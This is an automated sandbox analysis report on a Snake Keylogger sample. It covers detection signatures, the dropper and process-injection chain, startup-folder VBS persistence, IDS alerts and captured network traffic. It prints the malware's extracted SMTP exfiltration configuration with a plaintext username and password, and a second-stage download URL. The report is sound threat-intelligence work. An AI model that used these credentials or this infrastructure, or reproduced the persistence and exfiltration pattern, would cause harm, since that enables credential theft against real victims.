Windows Analysis Report
LAQfpnQvPQ.exe

Overview

General Information

Sample name: LAQfpnQvPQ.exe
renamed because original name is a hash value
Original sample name: b5d25a995424fd4d4fe5303ca4e90ceeb2794989f58213bda32b29c8716c5cfb.exe
Analysis ID: 1562379
MD5: 08565a4a256fb8f4f3497c695991829f
SHA1: b2c4d59213108fe33197e3685b1602f56047f62c
SHA256: b5d25a995424fd4d4fe5303ca4e90ceeb2794989f58213bda32b29c8716c5cfb
Tags: cia-tfexeuser-JAMESWT_MHT

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • LAQfpnQvPQ.exe (PID: 5144 cmdline: "C:\Users\user\Desktop\LAQfpnQvPQ.exe" MD5: 08565A4A256FB8F4F3497C695991829F)
    • LAQfpnQvPQ.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\LAQfpnQvPQ.exe" MD5: 08565A4A256FB8F4F3497C695991829F)
  • wscript.exe (PID: 5540 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ishon.exe (PID: 2888 cmdline: "C:\Users\user\AppData\Roaming\ishon.exe" MD5: 08565A4A256FB8F4F3497C695991829F)
      • ishon.exe (PID: 6184 cmdline: "C:\Users\user\AppData\Roaming\ishon.exe" MD5: 08565A4A256FB8F4F3497C695991829F)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000005.00000002.2515782521.0000000004351000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000007.00000002.3315771924.0000000003159000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000000.00000002.2244743417.00000000076A0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |

Source | Rule | Description | Author | Strings
5.2.ishon.exe.43511c0.0.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
7.2.ishon.exe.400000.0.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
0.2.LAQfpnQvPQ.exe.76a0000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
5.2.ishon.exe.4228890.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
5.2.ishon.exe.4228890.2.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |

                      System Summary

                      Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs", ProcessId: 5540, ProcessName: wscript.exe
                      Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs", ProcessId: 5540, ProcessName: wscript.exe

                      Data Obfuscation

                      Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\LAQfpnQvPQ.exe, ProcessId: 5144, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-11-25T14:59:25.057130+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49724 | 172.67.177.134 | 443 | TCP
                      2024-11-25T14:59:28.002851+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49732 | 172.67.177.134 | 443 | TCP
                      2024-11-25T14:59:31.118745+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49739 | 172.67.177.134 | 443 | TCP
                      2024-11-25T14:59:52.091612+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49798 | 172.67.177.134 | 443 | TCP
                      2024-11-25T15:00:01.235169+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49824 | 172.67.177.134 | 443 | TCP
                      2024-11-25T15:00:12.752103+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49851 | 172.67.177.134 | 443 | TCP

                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-11-25T14:59:20.605221+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 193.122.130.0 | 80 | TCP
                      2024-11-25T14:59:23.433379+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49712 | 193.122.130.0 | 80 | TCP
                      2024-11-25T14:59:26.280113+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49727 | 193.122.130.0 | 80 | TCP
                      2024-11-25T14:59:48.136512+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49789 | 193.122.130.0 | 80 | TCP
                      2024-11-25T14:59:50.308425+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49789 | 193.122.130.0 | 80 | TCP
                      2024-11-25T14:59:53.464717+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49802 | 193.122.130.0 | 80 | TCP
                      2024-11-25T14:59:56.511566+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49814 | 193.122.130.0 | 80 | TCP
                      2024-11-25T14:59:59.495922+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49821 | 193.122.130.0 | 80 | TCP

                      AV Detection

                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; ReversingLabs: Detection: 55%
                      Source: LAQfpnQvPQ.exe; ReversingLabs: Detection: 55%
                      Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\ishon.exe; Joe Sandbox ML: detected
                      Source: LAQfpnQvPQ.exe; Joe Sandbox ML: detected

                      Location Tracking

                      Source: unknown; DNS query: name: reallyfreegeoip.org
                      Source: LAQfpnQvPQ.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknown; HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49716 version: TLS 1.0
                      Source: unknown; HTTPS traffic detected: 192.168.2.5:49739 -> 172.67.177.134:443 version: TLS 1.0
                      Source: unknown; HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49792 version: TLS 1.0
                      Source: unknown; HTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.5:49710 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.5:49746 version: TLS 1.2
                      Source: LAQfpnQvPQ.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: LAQfpnQvPQ.exe, 00000000.00000002.2241775942.0000000006A10000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\

                      Networking

                      Source: Yara match; File source: 5.2.ishon.exe.4228890.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPE
                      Source: global traffic; HTTP traffic detected: GET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1 | Host: cia.tf | Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
                      Source: Joe Sandbox View; IP Address: 193.122.130.0
                      Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknown; DNS query: name: checkip.dyndns.org
                      Source: unknown; DNS query: name: reallyfreegeoip.org
                      Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 193.122.130.0:80
                      Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49727 -> 193.122.130.0:80
                      Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49789 -> 193.122.130.0:80
                      Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49821 -> 193.122.130.0:80
                      Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49814 -> 193.122.130.0:80
                      Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49802 -> 193.122.130.0:80
                      Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 172.67.177.134:443
                      Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49724 -> 172.67.177.134:443
                      Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49739 -> 172.67.177.134:443
                      Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49798 -> 172.67.177.134:443
                      Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 172.67.177.134:443
                      Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49851 -> 172.67.177.134:443
                      Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic HTTP traffic detected: GET /12e2f2f2315804d08baebc78b9269ad1.mp3 HTTP/1.1 Host: cia.tf Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
                      Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                      Source: global traffic DNS traffic detected: DNS query: cia.tf
                      Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000143F000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002FEA000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003028000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000311D000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003054000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003048000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3323711601.00000000061E2000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2518739694.0000000006BD2000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3324129689.0000000006720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: ishon.exe, 00000007.00000002.3324129689.0000000006720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000143F000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2218583888.0000000001685000.00000004.00000020.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3313003733.0000000001277000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000144D000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2502364705.000000000143F000.00000004.00000020.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3314491068.00000000012F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030A5000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.000000000307C000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003002000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003089000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000003097000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000003102000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000310F000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000313C000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000314B000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.000000000306C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000003.00000002.3315124818.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.3315771924.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: LAQfpnQvPQ.exe, ishon.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf
                      Source: ishon.exe, 00000005.00000002.2504335246.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HI.
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2219471547.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cia.tf/12e2f2f2315804d08baebc78b9269ad1.mp3HIC
                      Source: LAQfpnQvPQ.exe, 00000000.00000002.2244898671.0000000007700000.00000004.08000000.00040000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, LAQfpnQvPQ.exe, 00000000.00000002.2236686553.00000000043C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
